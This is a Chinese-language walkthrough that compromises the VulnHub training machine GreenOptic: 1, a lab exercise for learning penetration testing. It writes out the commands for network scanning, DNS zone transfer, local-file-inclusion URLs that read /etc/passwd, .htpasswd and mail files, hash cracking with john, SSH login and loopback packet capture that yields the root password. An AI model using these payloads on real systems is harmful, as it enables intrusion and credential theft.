一、准备工作
kali和靶机都选择NAT模式(kali与靶机同网段)
1.靶场环境
下载链接:GreenOptic: 1 ~ VulnHub
2.kali的ip
命令:ifconfig
3.靶机的ip
扫描靶机ip
sudo arp-scan -l
二、信息收集
1.nmap的信息收集
(1)扫描靶机开放的端口及其服务
nmap -A -sV 192.168.101.123
2.网站的信息收集
(1)靶机开放了80端口,先访问靶机网站看看有什么有用的信息
貌似没有什么信息
(2)靶机开放了10000端口,在浏览器中查看一下是否存在有用的信息
发现可能是dns域名解析的问题访问不到http://192.168.101.123:1000,在/etc/hosts文件添加如下信息
192.168.101.123 websrv01.greenoptic.vm
修改完成后,点击刚才页面提示的那个网站
随即进入到登录界面
暂时不知账号密码,先放一放
(3)dirb扫描网站的登录界面
dirb http://192.168.101.123
浏览器登录http://192.168.101.123/account,发现了一个登录界面
虽然没有账号密码登录,但是发现了url可能存在文件包含
http://192.168.101.123/account/index.php?include=/etc/passwd
如上图所示,创建一个文件将这些用户名收集起来,将筛选出来的用户放到username里面
vim user
cat user | grep /bin/bash
vim username
dnsenum --dnsserver 192.168.101.123 --enum greenoptic.vm
(4)找到了另一个域名,设置hosts后访问。发现需要账号密码
dig @192.168.101.123 greenoptic.vm axfr
在/etc/hosts 添加recoveryplan.greenoptic.vm域名
(5)发现一个加密的密码
在view-source:http://192.168.101.123/account/index.php?include=/var/www/.htpasswd一个密码
staff:$apr1$YQNFpPkc$rhUZOxRE55Nkl4EDn.1Po.
(6)用john进行md5解密
cp password password.dc
john --wordlist=/usr/share/wordlists/rockyou.txt password.dc
(7)成功登录http://recoveryplan.greenoptic.vm/
用刚才获取到用户密码登录http://recoveryplan.greenoptic.vm/
进入到key information, 按照提示利用本地文件包含去读terry-/var/mail/terry和sam-/var/mail/sam的邮件,同时下载dpi.zip。 下载好dpi.zip后解压它
cd /下载
unzip dpi.zip
发现解压时需要密码,提示说以邮件形式发送
查看邮件
view-source:http://192.168.101.123/account/index.php?include=/var/mail/sam
利用HelloSunshine123密码解压得出dpi.pcap文件
(7)wireshark流量分析
使用wireshark对dpi.pcap文件进行流量分析
wireshark
1.选择要分析的文件
2.分析
点击统计里面的conversation
tcp流量是当中最多的,可能存在信息
3.找到一组账号密码
alex:FwejAASD1
利用刚才得到用户密码,ssh远程登录
ssh alex@192.168.101.123
3.获取shell
三、漏洞的发现与利用
1.pspy64s监听进程
(1)下载好pspy64s工具到/var/www/html下面
cd /var/www/html
wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64s
将pspy64s工具下载到靶机上
(2)在kali开启一个Http服务
python -m SimpleHTTPServer
(3)远程用户alex下载pspy64s工具
wget 192.168.101.10:8000/pspy64s
(4)提升pspy64s权限
chmod 777 pspy64s
ls -l
(5)启动pspy64s查看进程,寻找可以利用的漏洞
./pspy64s
2.通过流量包分析
用户alex文件夹下有一个wireshark文件夹,同时还发现alex属于wireshark用户组
ls -all
cat /etc/group|grep wireshark
使用dumpcap抓取本地环回地址包一段时间,下载到本地使用wireshark解析。
dumpcap -w test.pcap -i lo
一段时间后ctrl+c退出
将流量包下载到kali上
在靶机
cp test.pcap /tmp/
在kali
scp alex@192.168.101.123:/tmp/test.pcap ./
wireshark
发现有Auth包,base64解码得到了root用户口令ASfojoj2eozxczzmedlmedASASDKoj3o
拿下flag
cd /root
cat root.txt